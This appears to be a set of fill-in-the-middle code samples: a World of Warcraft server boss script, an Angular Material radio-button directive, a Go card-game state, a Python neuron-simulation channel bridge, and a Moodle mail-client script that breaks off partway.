<|file_name|>boss_jandice_barov.cpp<|end_file_name|><|fim▁begin|>/* * This file is part of the TrinityCore Project. See AUTHORS file for Copyright information * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along * with this program. If not, see <http://www.gnu.org/licenses/>. */ #include "ScriptMgr.h" #include "scholomance.h" #include "ScriptedCreature.h" enum Spells { SPELL_CURSE_OF_BLOOD = 24673, SPELL_ILLUSION = 17773, SPELL_DROP_JOURNAL = 26096 }; enum Events { EVENT_CURSE_OF_BLOOD = 1, EVENT_ILLUSION, EVENT_CLEAVE, EVENT_SET_VISIBILITY }; class boss_jandice_barov : public CreatureScript { public: boss_jandice_barov() : CreatureScript("boss_jandice_barov") { } struct boss_jandicebarovAI : public ScriptedAI { boss_jandicebarovAI(Creature* creature) : ScriptedAI(creature), Summons(me) { } void Reset() override { events.Reset(); Summons.DespawnAll(); } void JustSummoned(Creature* summoned) override { // Illusions should attack a random target. if (Unit* target = SelectTarget(SELECT_TARGET_RANDOM, 0)) summoned->AI()->AttackStart(target); summoned->ApplySpellImmune(0, IMMUNITY_DAMAGE, SPELL_SCHOOL_MASK_MAGIC, true); // Not sure if this is correct. Summons.Summon(summoned); } void JustEngagedWith(Unit* /*who*/) override {<|fim▁hole|> void JustDied(Unit* /*killer*/) override { Summons.DespawnAll(); DoCastSelf(SPELL_DROP_JOURNAL, true); } void UpdateAI(uint32 diff) override { if (!UpdateVictim()) return; events.Update(diff); if (me->HasUnitState(UNIT_STATE_CASTING)) return; while (uint32 eventId = events.ExecuteEvent()) { switch (eventId) { case EVENT_CURSE_OF_BLOOD: DoCastVictim(SPELL_CURSE_OF_BLOOD); events.ScheduleEvent(EVENT_CURSE_OF_BLOOD, 30s); break; case EVENT_ILLUSION: DoCast(SPELL_ILLUSION); me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE); me->SetDisplayId(11686); // Invisible Model ModifyThreatByPercent(me->GetVictim(), -99); events.ScheduleEvent(EVENT_SET_VISIBILITY, 3s); events.ScheduleEvent(EVENT_ILLUSION, 25s); break; case EVENT_SET_VISIBILITY: me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE); me->SetDisplayId(11073); //Jandice Model break; default: break; } if (me->HasUnitState(UNIT_STATE_CASTING)) return; } DoMeleeAttackIfReady(); } private: EventMap events; SummonList Summons; }; CreatureAI* GetAI(Creature* creature) const override { return GetScholomanceAI<boss_jandicebarovAI>(creature); } }; void AddSC_boss_jandicebarov() { new boss_jandice_barov(); }<|fim▁end|>
events.ScheduleEvent(EVENT_CURSE_OF_BLOOD, 15s); events.ScheduleEvent(EVENT_ILLUSION, 30s); }
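The completion above seeds TrinityCore's EventMap when the boss engages; UpdateAI then advances those timers each tick and re-schedules whatever fires. A toy Python rendition of that tick/execute loop, for illustration only; it mimics the shape of the pattern, not the actual TrinityCore API:

class EventMap:
    def __init__(self):
        self.timers = {}  # event name -> milliseconds remaining

    def schedule(self, event, delay_ms):
        self.timers[event] = delay_ms

    def update(self, diff_ms):
        for event in self.timers:
            self.timers[event] -= diff_ms

    def execute(self):
        # pop every event whose timer has elapsed, like ExecuteEvent()
        ready = [e for e, t in self.timers.items() if t <= 0]
        for e in ready:
            del self.timers[e]
        return ready

events = EventMap()
events.schedule('CURSE_OF_BLOOD', 15000)  # mirrors the 15s in the completion
events.schedule('ILLUSION', 30000)
events.update(15000)
for event in events.execute():
    print('firing', event)  # the real script casts the spell here and re-schedules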
<|file_name|>radioButton.js<|end_file_name|><|fim▁begin|>/*! * Angular Material Design * https://github.com/angular/material * @license MIT * v0.10.1-rc2-master-7bbfd1f */ goog.provide('ng.material.components.radioButton'); goog.require('ng.material.core'); /** * @ngdoc module * @name material.components.radioButton * @description radioButton module! */ angular.module('material.components.radioButton', [ 'material.core' ]) .directive('mdRadioGroup', mdRadioGroupDirective) .directive('mdRadioButton', mdRadioButtonDirective); /** * @ngdoc directive * @module material.components.radioButton * @name mdRadioGroup * * @restrict E * * @description * The `<md-radio-group>` directive identifies a grouping * container for the 1..n grouped radio buttons; specified using nested * `<md-radio-button>` tags. * * As per the [material design spec](http://www.google.com/design/spec/style/color.html#color-ui-color-application) * the radio button is in the accent color by default. The primary color palette may be used with * the `md-primary` class. * * Note: `<md-radio-group>` and `<md-radio-button>` handle tabindex differently * than the native `<input type='radio'>` controls. Whereas the native controls * force the user to tab through all the radio buttons, `<md-radio-group>` * is focusable, and by default the `<md-radio-button>`s are not. * * @param {string} ng-model Assignable angular expression to data-bind to. * @param {boolean=} md-no-ink Use of attribute indicates flag to disable ink ripple effects. * * @usage * <hljs lang="html"> * <md-radio-group ng-model="selected"> * * <md-radio-button * ng-repeat="d in colorOptions" * ng-value="d.value" aria-label="{{ d.label }}"> * * {{ d.label }} * * </md-radio-button> * * </md-radio-group> * </hljs> * */ function mdRadioGroupDirective($mdUtil, $mdConstant, $mdTheming, $timeout) { RadioGroupController.prototype = createRadioGroupControllerProto(); return { restrict: 'E', controller: ['$element', RadioGroupController], require: ['mdRadioGroup', '?ngModel'], link: { pre: linkRadioGroup } }; function linkRadioGroup(scope, element, attr, ctrls) { $mdTheming(element); var rgCtrl = ctrls[0]; var ngModelCtrl = ctrls[1] || $mdUtil.fakeNgModel(); function setFocus() { if (!element.hasClass('md-focused')) { element.addClass('md-focused'); } } function keydownListener(ev) { var keyCode = ev.which || ev.keyCode; switch(keyCode) { case $mdConstant.KEY_CODE.LEFT_ARROW: case $mdConstant.KEY_CODE.UP_ARROW: ev.preventDefault(); rgCtrl.selectPrevious(); setFocus(); break; case $mdConstant.KEY_CODE.RIGHT_ARROW: case $mdConstant.KEY_CODE.DOWN_ARROW: ev.preventDefault(); rgCtrl.selectNext(); setFocus(); break; case $mdConstant.KEY_CODE.ENTER: var form = angular.element($mdUtil.getClosest(element[0], 'form')); if (form.length > 0) { form.triggerHandler('submit'); } break;<|fim▁hole|> rgCtrl.init(ngModelCtrl); scope.mouseActive = false; element.attr({ 'role': 'radiogroup', 'tabIndex': element.attr('tabindex') || '0' }) .on('keydown', keydownListener) .on('mousedown', function(event) { scope.mouseActive = true; $timeout(function() { scope.mouseActive = false; }, 100); }) .on('focus', function() { if(scope.mouseActive === false) { rgCtrl.$element.addClass('md-focused'); } }) .on('blur', function() { rgCtrl.$element.removeClass('md-focused'); }); } function RadioGroupController($element) { this._radioButtonRenderFns = []; this.$element = $element; } function createRadioGroupControllerProto() { return { init: function(ngModelCtrl) { this._ngModelCtrl = ngModelCtrl; 
this._ngModelCtrl.$render = angular.bind(this, this.render); }, add: function(rbRender) { this._radioButtonRenderFns.push(rbRender); }, remove: function(rbRender) { var index = this._radioButtonRenderFns.indexOf(rbRender); if (index !== -1) { this._radioButtonRenderFns.splice(index, 1); } }, render: function() { this._radioButtonRenderFns.forEach(function(rbRender) { rbRender(); }); }, setViewValue: function(value, eventType) { this._ngModelCtrl.$setViewValue(value, eventType); // update the other radio buttons as well this.render(); }, getViewValue: function() { return this._ngModelCtrl.$viewValue; }, selectNext: function() { return changeSelectedButton(this.$element, 1); }, selectPrevious: function() { return changeSelectedButton(this.$element, -1); }, setActiveDescendant: function (radioId) { this.$element.attr('aria-activedescendant', radioId); } }; } /** * Change the radio group's selected button by a given increment. * If no button is selected, select the first button. */ function changeSelectedButton(parent, increment) { // Coerce all child radio buttons into an array, then wrap then in an iterator var buttons = $mdUtil.iterator(parent[0].querySelectorAll('md-radio-button'), true); if (buttons.count()) { var validate = function (button) { // If disabled, then NOT valid return !angular.element(button).attr("disabled"); }; var selected = parent[0].querySelector('md-radio-button.md-checked'); var target = buttons[increment < 0 ? 'previous' : 'next'](selected, validate) || buttons.first(); // Activate radioButton's click listener (triggerHandler won't create a real click event) angular.element(target).triggerHandler('click'); } } } mdRadioGroupDirective.$inject = ["$mdUtil", "$mdConstant", "$mdTheming", "$timeout"]; /** * @ngdoc directive * @module material.components.radioButton * @name mdRadioButton * * @restrict E * * @description * The `<md-radio-button>`directive is the child directive required to be used within `<md-radio-group>` elements. * * While similar to the `<input type="radio" ng-model="" value="">` directive, * the `<md-radio-button>` directive provides ink effects, ARIA support, and * supports use within named radio groups. * * @param {string} ngModel Assignable angular expression to data-bind to. * @param {string=} ngChange Angular expression to be executed when input changes due to user * interaction with the input element. * @param {string} ngValue Angular expression which sets the value to which the expression should * be set when selected.* * @param {string} value The value to which the expression should be set when selected. * @param {string=} name Property name of the form under which the control is published. * @param {string=} aria-label Adds label to radio button for accessibility. * Defaults to radio button's text. If no text content is available, a warning will be logged. 
* * @usage * <hljs lang="html"> * * <md-radio-button value="1" aria-label="Label 1"> * Label 1 * </md-radio-button> * * <md-radio-button ng-model="color" ng-value="specialValue" aria-label="Green"> * Green * </md-radio-button> * * </hljs> * */ function mdRadioButtonDirective($mdAria, $mdUtil, $mdTheming) { var CHECKED_CSS = 'md-checked'; return { restrict: 'E', require: '^mdRadioGroup', transclude: true, template: '<div class="md-container" md-ink-ripple md-ink-ripple-checkbox>' + '<div class="md-off"></div>' + '<div class="md-on"></div>' + '</div>' + '<div ng-transclude class="md-label"></div>', link: link }; function link(scope, element, attr, rgCtrl) { var lastChecked; $mdTheming(element); configureAria(element, scope); rgCtrl.add(render); attr.$observe('value', render); element .on('click', listener) .on('$destroy', function() { rgCtrl.remove(render); }); function listener(ev) { if (element[0].hasAttribute('disabled')) return; scope.$apply(function() { rgCtrl.setViewValue(attr.value, ev && ev.type); }); } function render() { var checked = (rgCtrl.getViewValue() == attr.value); if (checked === lastChecked) { return; } lastChecked = checked; element.attr('aria-checked', checked); if (checked) { element.addClass(CHECKED_CSS); rgCtrl.setActiveDescendant(element.attr('id')); } else { element.removeClass(CHECKED_CSS); } } /** * Inject ARIA-specific attributes appropriate for each radio button */ function configureAria( element, scope ){ scope.ariaId = buildAriaID(); element.attr({ 'id' : scope.ariaId, 'role' : 'radio', 'aria-checked' : 'false' }); $mdAria.expectWithText(element, 'aria-label'); /** * Build a unique ID for each radio button that will be used with aria-activedescendant. * Preserve existing ID if already specified. * @returns {*|string} */ function buildAriaID() { return attr.id || ( 'radio' + "_" + $mdUtil.nextUid() ); } } } } mdRadioButtonDirective.$inject = ["$mdAria", "$mdUtil", "$mdTheming"]; ng.material.components.radioButton = angular.module("material.components.radioButton");<|fim▁end|>
} }
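The two closing braces above finish mdRadioGroup's keydown switch, whose arrow-key cases walk the sibling radio buttons with wrap-around while skipping disabled ones (changeSelectedButton plus its validate callback). The selection rule reduces to a few lines; this Python sketch is illustrative only and does not use the YUI iterator API:

def next_enabled(buttons, selected, step):
    # buttons: list of (name, disabled) pairs; step is +1 or -1
    n = len(buttons)
    i = selected
    for _ in range(n):
        i = (i + step) % n  # wrap-around, like iterator next()/previous()
        if not buttons[i][1]:
            return i
    return selected  # everything disabled: stay put

buttons = [('red', False), ('green', True), ('blue', False)]
print(buttons[next_enabled(buttons, 0, +1)][0])  # 'blue' -- the disabled 'green' is skipped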
<|file_name|>state.go<|end_file_name|><|fim▁begin|>package main

import (
	"fmt"
	"sort"
	"strings"
)

type State struct {<|fim▁hole|>
	Picks   []string
	victory int
	numProv int
}

func (s *State) NewCopy() State {
	ds := State{}
	ds.hand = make([]string, len(s.hand))
	ds.discard = make([]string, len(s.discard))
	ds.deck = make([]string, len(s.deck))
	ds.Picks = make([]string, len(s.Picks))
	copy(ds.hand, s.hand)
	copy(ds.discard, s.discard)
	copy(ds.deck, s.deck)
	copy(ds.Picks, s.Picks)
	ds.victory = -1
	ds.numProv = -1
	return ds
}

func (s *State) PickState() string {
	return strings.Join(s.Picks, " ")
}

func (s *State) Print() {
	var c []string
	c = append(c, "HAND")
	c = append(c, s.hand...)
	c = append(c, "DISCARD")
	c = append(c, s.discard...)
	c = append(c, "DECK")
	c = append(c, s.deck...)
	c = append(c, "PICKS")
	c = append(c, s.Picks...)
	fmt.Println(strings.Join(c, " "))
	fmt.Printf("Victory points: %d\n", s.TotalVictory())
}

func (s *State) StringHand() string {
	return strings.Join(s.hand, ",")
}

func (s *State) Init() {
	for i := 0; i < 3; i++ {
		s.deck = append(s.deck, "estate")
	}
	for i := 0; i < 7; i++ {
		s.deck = append(s.deck, "copper")
	}
	shuffle(s.deck)
	if s.TotalCards() != 10 {
		panic("Invalid initialization of state")
	}
	s.victory = -1
	s.numProv = -1
}

func (s *State) drawCards(num int) []string {
	numcards := len(s.deck) + len(s.discard)
	if len(s.deck) < num {
		s.discard = append(s.discard, s.deck...)
		s.deck = s.deck[:0]
		shuffle(s.discard)
		s.deck = make([]string, len(s.discard))
		copy(s.deck, s.discard)
		// s.deck = s.discard
		s.discard = s.discard[:0]
		if len(s.discard) != 0 {
			panic("Coder's fault")
		}
	}
	if len(s.deck) < num {
		// Chapel strategy can trash a lot of cards.
		num = len(s.deck)
	}
	cards := make([]string, num)
	copy(cards, s.deck[0:num])
	s.deck = s.deck[num:]
	if len(s.deck)+len(s.discard) != numcards-num {
		panic("Coder's fault again")
	}
	return cards
}

func (s *State) DrawHand() {
	if len(s.hand) != 0 {
		panic("Already have hand")
		// fmt.Println("Already have hand")
		return
	}
	cards := s.drawCards(5)
	s.hand = make([]string, len(cards))
	copy(s.hand, cards)
}

func (s *State) AddToHand(num int) {
	cards := s.drawCards(num)
	s.hand = append(s.hand, cards...)
}

func (s *State) CardInHand(name string) bool {
	for _, card := range s.hand {
		if card == name {
			return true
		}
	}
	return false
}

func (s *State) CopyHand() []string {
	cp := make([]string, len(s.hand))
	copy(cp, s.hand)
	return cp
}

func (s *State) TrashFromHand(indices []int) string {
	var trashed []string
	for _, idx := range indices {
		if idx >= len(s.hand) {
			panic("Invalid index")
		}
		trashed = append(trashed, s.hand[idx])
		s.hand[idx] = ""
	}
	var newh []string
	for _, card := range s.hand {
		if card != "" {
			newh = append(newh, card)
		}
	}
	s.hand = newh
	sort.Sort(sort.StringSlice(trashed))
	return strings.Join(trashed, ",")
}

func (s *State) TrashUselessCards() {
	var newh []string
	for _, card := range s.hand {
		if card == "copper" || card == "estate" {
			continue
		}
		newh = append(newh, card)
	}
	s.hand = newh
}

func (s *State) AddCardAndDiscardHand(c string) {
	s.victory = -1
	s.numProv = -1
	s.discard = append(s.discard, c)
	s.Picks = append(s.Picks, c)
	s.Discard()
}

func (s *State) Discard() {
	s.discard = append(s.discard, s.hand...)
s.hand = s.hand[:0] if len(s.hand) != 0 { panic("Hand should be zero.") } } func (s *State) Value() int { total := 0 for _, card := range s.hand { total += GetValue(card) } return total } func (s *State) TotalVictory() int { if s.victory != -1 { return s.victory } total := 0 for _, card := range s.discard { total += GetVictory(card) } for _, card := range s.deck { total += GetVictory(card) } for _, card := range s.hand { total += GetVictory(card) } s.victory = total return total } func (s *State) NumProvinces() int { if s.numProv != -1 { return s.numProv } s.numProv = s.TotalCardsByName("province") return s.numProv } func (s *State) TotalCards() int { total := 0 total += len(s.discard) total += len(s.hand) total += len(s.deck) return total } func (s *State) TotalCardsByName(name string) int { total := 0 for _, card := range s.discard { if card == name { total += 1 } } for _, card := range s.deck { if card == name { total += 1 } } for _, card := range s.hand { if card == name { total += 1 } } return total }<|fim▁end|>
hand []string discard []string deck []string
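state.go's drawCards implements the standard deck-builder mechanic: when the deck runs short, the discard pile is shuffled back in, and a heavily trashed collection may still come up short of the request. The same invariant in a compact Python sketch; the function and variable names are mine, not from the Go file:

import random

def draw_cards(deck, discard, num):
    # fold the discard pile back into the deck when it runs short
    if len(deck) < num:
        deck += discard
        discard.clear()
        random.shuffle(deck)
    num = min(num, len(deck))  # heavy trashing can leave fewer than num cards in total
    drawn = deck[:num]
    del deck[:num]
    return drawn

deck = ['estate'] * 3 + ['copper'] * 7  # the Init() starting deck
discard = []
random.shuffle(deck)
print(draw_cards(deck, discard, 5))  # a five-card opening hand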
<|file_name|>neuroml_via_neurounits_neuron.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # -*- coding: utf-8 -*- # --------------------------------------------------------------------- # Copyright (c) 2012 Michael Hull. # All rights reserved. #<|fim▁hole|># # - Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # - Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ---------------------------------------------------------------------- from morphforge.simulation.neuron.core.neuronsimulationenvironment import NEURONEnvironment from morphforgecontrib.simulation.channels.neuroml_via_neurounits.neuroml_via_neurounits_core import NeuroML_Via_NeuroUnits_Channel from neurounits.importers.neuroml import ChannelMLReader from morphforgecontrib.simulation.channels.neurounits.neuro_units_bridge import Neuron_NeuroUnitEqnsetMechanism class NeuroML_Via_NeuroUnits_ChannelNEURON(Neuron_NeuroUnitEqnsetMechanism, NeuroML_Via_NeuroUnits_Channel): def __init__(self, xml_filename, chlname=None,**kwargs): (eqnset, chlinfo, default_params) = ChannelMLReader.BuildEqnset(xml_filename) default_params = dict([(k, v.as_quantities_quantity()) for (k, v) in default_params.iteritems()]) super(NeuroML_Via_NeuroUnits_ChannelNEURON,self).__init__(eqnset=eqnset, default_parameters=default_params, recordables_map=None, recordables_data=None, xml_filename=xml_filename, chlname=chlname, **kwargs) NEURONEnvironment.channels.register_plugin(NeuroML_Via_NeuroUnits_Channel, NeuroML_Via_NeuroUnits_ChannelNEURON)<|fim▁end|>
# Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met:
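The bridge module above closes by registering the NEURON-specific class against the simulator-agnostic channel description, so the environment can later resolve one from the other. The registry pattern itself is tiny; this Python sketch shows its shape with hypothetical names and is not morphforge's actual API:

class PluginRegistry:
    def __init__(self):
        self._impls = {}

    def register_plugin(self, interface_cls, impl_cls):
        # map the generic description to its backend implementation
        self._impls[interface_cls] = impl_cls

    def resolve(self, interface_cls):
        return self._impls[interface_cls]

class Channel:                 # simulator-agnostic description
    pass

class ChannelNEURON(Channel):  # backend-specific implementation
    pass

registry = PluginRegistry()
registry.register_plugin(Channel, ChannelNEURON)
assert registry.resolve(Channel) is ChannelNEURON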
<|file_name|>mail.js<|end_file_name|><|fim▁begin|>YUI(M.yui.loader, {lang: M.local_mail_lang}).use('io-base', 'node', 'json-parse', 'panel', 'datatable-base', 'dd-plugin', 'moodle-form-dateselector', 'datatype-date', 'calendar-base', function(Y) { var mail_message_view = false; var mail_checkbox_labels_default = {}; var mail_view_type = ''; var mail_edit_label_panel; var mail_new_label_panel; var mail_undo_function = ''; var mail_undo_ids = ''; var mail_search_selected = ''; var mail_searchfrom_selected = ''; var mail_searchto_selected = ''; var mail_unread_selected = false; var mail_attach_selected = false; var mail_date_selected = ''; var mail_doing_search = false; var mail_after_message_search = false; var mail_before_message_search = false; var mail_perpageid = 0; var init = function(){ mail_view_type = Y.one('input[name="type"]').get('value'); if (Y.one('input[name="m"]')) { mail_message_view = true; Y.one('.mail_checkbox_all').remove(); } mail_enable_all_buttons(mail_message_view); if (!mail_message_view) { mail_select_none(); } if (mail_view_type == 'trash') { mail_remove_action('.mail_menu_action_markasstarred'); mail_remove_action('.mail_menu_action_markasunstarred'); } mail_update_menu_actions(); mail_create_edit_label_panel(); mail_create_new_label_panel(); mail_define_label_handlers(); }; var mail_define_label_handlers = function () { if (Y.one('#local_mail_form_new_label')) { //Click on new label color div Y.one('#local_mail_form_new_label').delegate('click', function(e) { e.stopPropagation(); mail_label_set_selected(this, 'new'); }, '.mail_label_color'); } if (Y.one('#local_mail_form_edit_label')) { //Click on edit label color div Y.one('#local_mail_form_edit_label').delegate('click', function(e) { e.stopPropagation(); mail_label_set_selected(this, 'edit'); }, '.mail_label_color'); } }; var mail_create_edit_label_panel = function () { var title = M.util.get_string('editlabel', 'local_mail'); var obj = (Y.one('.mail_list')?Y.one('.mail_list'):Y.one('.mail_view')); var position = obj.getXY(); var width = 400; var posx = position[0]+(Y.one('body').get('offsetWidth')/2)-width; mail_edit_label_panel = new Y.Panel({ srcNode : '#local_mail_form_edit_label', headerContent: title, width : width, zIndex : 5, centered : false, modal : true, visible : false, render : true, xy : [posx,position[1]], plugins : [Y.Plugin.Drag] }); mail_edit_label_panel.addButton({ value : M.util.get_string('submit', 'moodle'), section: Y.WidgetStdMod.FOOTER, action : function (e) { e.preventDefault(); mail_edit_label_panel.hide(); mail_doaction('setlabel'); } }); mail_edit_label_panel.addButton({ value : M.util.get_string('cancel', 'moodle'), section: Y.WidgetStdMod.FOOTER, action : function (e) { e.preventDefault(); mail_edit_label_panel.hide(); } }); }; var mail_create_new_label_panel = function () { var title = M.util.get_string('newlabel', 'local_mail'); var obj = (Y.one('.mail_list')?Y.one('.mail_list'):Y.one('.mail_view')); var position = obj.getXY(); var width = 400; var posx = position[0]+(Y.one('body').get('offsetWidth')/2)-width; mail_new_label_panel = new Y.Panel({ srcNode : '#local_mail_form_new_label', headerContent: title, width : width, zIndex : 5, centered : true, modal : true, visible : false, render : true, xy : [posx,position[1]], plugins : [Y.Plugin.Drag] }); mail_new_label_panel.addButton({ value : M.util.get_string('submit', 'moodle'), section: Y.WidgetStdMod.FOOTER, action : function (e) { e.preventDefault(); mail_new_label_panel.hide(); mail_doaction('newlabel'); } }); 
mail_new_label_panel.addButton({ value : M.util.get_string('cancel', 'moodle'), section: Y.WidgetStdMod.FOOTER, action : function (e) { e.preventDefault(); mail_new_label_panel.hide(); } }); }; var mail_hide_actions = function() { Y.all('.mail_menu_actions li').each(function(node){ node.hide(); }); mail_show_label_actions(false); }; var mail_show_label_actions = function(separator) { if (mail_view_type == 'label' && !mail_message_view) { if (separator) { Y.one('.mail_menu_action_separator').ancestor('li').show(); } Y.one('.mail_menu_action_editlabel').ancestor('li').show(); Y.one('.mail_menu_action_removelabel').ancestor('li').show(); } }; var mail_update_menu_actions = function() { var separator = false; mail_hide_actions(); if (mail_message_view) { if (mail_view_type == 'trash') { Y.one('.mail_menu_action_markasunread').ancestor('li').show(); } else { Y.one('.mail_menu_action_markasunread').ancestor('li').show(); if (Y.one('.mail_flags span').hasClass('mail_starred')) { Y.one('.mail_menu_action_markasunstarred').ancestor('li').show(); } else { Y.one('.mail_menu_action_markasstarred').ancestor('li').show(); } } } else { if (Y.all('.mail_selected.mail_unread').size()) { Y.one('.mail_menu_action_markasread').ancestor('li').show(); separator = true; } if (Y.all('.mail_selected.mail_unread').size() < Y.all('.mail_selected').size()) { Y.one('.mail_menu_action_markasunread').ancestor('li').show(); separator = true; } if (Y.all('.mail_selected span.mail_starred').size()) { Y.one('.mail_menu_action_markasunstarred').ancestor('li').show(); separator = true; } if (Y.all('.mail_selected span.mail_unstarred').size()) { Y.one('.mail_menu_action_markasstarred').ancestor('li').show(); separator = true; } } mail_show_label_actions(separator); }; var mail_toggle_menu = function() { var button = Y.one('.mail_checkbox_all'); var menu = Y.one('.mail_optselect'); var position = button.getXY(); if (!button.hasClass('mail_button_disabled')) { position[1] += button.get('clientHeight') + 2; menu.toggleClass('mail_hidden'); menu.setXY(position); } }; var mail_hide_menu_options = function() { Y.one('.mail_optselect').addClass('mail_hidden'); }; var mail_hide_menu_actions = function() { Y.one('.mail_actselect').addClass('mail_hidden'); }; var mail_hide_menu_labels = function() { if (mail_view_type != 'trash') { Y.one('.mail_labelselect').addClass('mail_hidden'); } }; var mail_hide_menu_search = function() { var menu = Y.one('#mail_menu_search'); if (menu) { menu.addClass('mail_hidden'); } if (M.form.dateselector.panel) { M.form.dateselector.panel.hide(); } }; var mail_toggle_menu_actions = function() { var button = Y.one('.mail_more_actions'); var menu = Y.one('.mail_actselect'); var position = button.getXY(); if (!button.hasClass('mail_button_disabled')) { position[1] += button.get('clientHeight') + 2; menu.toggleClass('mail_hidden'); menu.setXY(position); } }; var mail_toggle_menu_labels = function() { var button = Y.one('.mail_assignlbl'); var menu = Y.one('.mail_labelselect'); var position = button.getXY(); if (!button.hasClass('mail_button_disabled')) { position[1] += button.get('clientHeight') + 2; menu.toggleClass('mail_hidden'); menu.setXY(position); } }; var mail_toggle_menu_search = function() { var button = Y.one('#mail_search'); var menu = Y.one('#mail_menu_search'); var advsearch = Y.one('#mail_adv_search'); var position = button.getXY(); var date; position[1] += button.get('clientHeight') + 2; menu.toggleClass('mail_hidden'); menu.setXY(position); if (!menu.hasClass('mail_hidden')) { 
Y.one('#textsearch').focus(); if (!advsearch.hasClass('mail_hidden')) { mail_position_datepicker(); } if (mail_doing_search) { Y.one('#buttoncancelsearch').removeClass('mail_hidden'); } else { Y.one('#buttoncancelsearch').addClass('mail_hidden'); } } else { M.form.dateselector.panel.hide(); } }; var mail_toggle_adv_search = function() { var menu = Y.one('#mail_adv_search'); var status = Y.one('#mail_adv_status'); menu.toggleClass('mail_hidden'); if (menu.hasClass('mail_hidden')) { M.form.dateselector.panel.hide(); status.set('src', M.util.image_url('t/collapsed', 'moodle')); status.set('alt', 'collapsed'); } else { mail_position_datepicker(); status.set('src', M.util.image_url('t/expanded', 'moodle')); status.set('alt' ,'expanded'); } }; var mail_do_search = function() { mail_doing_search = true; mail_perpageid = 0; mail_search_selected = Y.one('#textsearch').get('value'); mail_searchfrom_selected = Y.one('#textsearchfrom').get('value'); mail_searchto_selected = Y.one('#textsearchto').get('value'); mail_unread_selected = Y.one('#searchunread').get('checked'); mail_attach_selected = Y.one('#searchattach').get('checked'); mail_select_none(); mail_check_selected(); Y.all('.mail_paging input').set('disabled', 'disabled'); mail_show_loading_image(); mail_doaction('search'); mail_hide_menu_search(); }; var mail_show_loading_image = function() { Y.one('.mail_list').addClass('mail_hidden'); Y.one('.mail_search_loading').removeClass('mail_hidden'); }; var mail_update_form_search = function() { Y.one('#textsearch').set('value', mail_search_selected); Y.one('#textsearchfrom').set('value', mail_searchfrom_selected); Y.one('#textsearchto').set('value', mail_searchto_selected); if (mail_unread_selected) { Y.one('#searchunread').set('checked', 'checked'); } if (mail_attach_selected) { Y.one('#searchattach').set('checked', 'checked'); } }; var mail_remove_action = function(action) { Y.one(action).ancestor('li').remove(); }; var mail_customize_menu_actions = function(checkbox) { var menu = Y.one('.mail_menu_actions'); var mailitem = checkbox.ancestor('.mail_item'); var separator = false; var nodes; if (mail_is_checkbox_checked(checkbox)) { //Read or unread if (mailitem.hasClass('mail_unread')) { menu.one('a.mail_menu_action_markasread').ancestor('li').show(); separator = true; } else { menu.one('a.mail_menu_action_markasunread').ancestor('li').show(); separator = true; } //Starred or unstarred if (mail_view_type != 'trash' && mailitem.one('.mail_flags span').hasClass('mail_starred')) { menu.one('a.mail_menu_action_markasunstarred').ancestor('li').show(); separator = true; } else { if (mail_view_type != 'trash') { menu.one('a.mail_menu_action_markasstarred').ancestor('li').show(); separator = true; } } } else { if (!Y.all('.mail_list .mail_selected').size()) { mail_hide_actions(); } else { //Read or unread if (mailitem.hasClass('mail_unread')) { if (!mailitem.siblings('.mail_selected.mail_unread').size()) { menu.one('a.mail_menu_action_markasread').ancestor('li').hide(); } } else { if (mailitem.siblings('.mail_selected.mail_unread').size() == mailitem.siblings('.mail_selected').size()) { menu.one('a.mail_menu_action_markasunread').ancestor('li').hide(); } } //Starred or unstarred if (mail_view_type != 'trash' && mailitem.one('.mail_flags a span').hasClass('mail_starred')) { nodes = mailitem.siblings(function(obj) { return obj.hasClass('mail_selected') && obj.one('.mail_flags a span.mail_starred'); }); if (!nodes.size()) { menu.one('a.mail_menu_action_markasunstarred').ancestor('li').hide(); } } else { nodes 
= mailitem.siblings(function(obj) { return obj.hasClass('mail_selected') && obj.one('.mail_flags a span.mail_unstarred'); }); if (mail_view_type != 'trash' && !nodes.size()) { menu.one('a.mail_menu_action_markasstarred').ancestor('li').hide(); } } } } mail_show_label_actions(separator); }; var mail_label_default_values = function () { var grouplabels; if (Y.one('.mail_labelselect').hasClass('mail_hidden')) { Y.each(M.local_mail.mail_labels, function (label, index) { mail_checkbox_labels_default[index] = 0; }); if (mail_message_view) { grouplabels = Y.all('.mail_group_labels span'); if (grouplabels) { mail_set_label_default_values(grouplabels); } } else { var nodes = mail_get_checkboxs_checked(); Y.each(nodes, function (node, index) { grouplabels = node.ancestor('.mail_item').all('.mail_group_labels span'); if (grouplabels) { mail_set_label_default_values(grouplabels); } }); } mail_label_set_values(); } }; var mail_set_label_default_values = function (grouplabels) { var classnames = []; var num; Y.each(grouplabels, function (grouplabel, index) { classnames = grouplabel.getAttribute('class').split(' '); Y.each(classnames, function(classname){ num = /mail_label_(\d+)/.exec(classname); if (num) { mail_checkbox_labels_default[num[1]] += 1; } }); }); if (mail_view_type 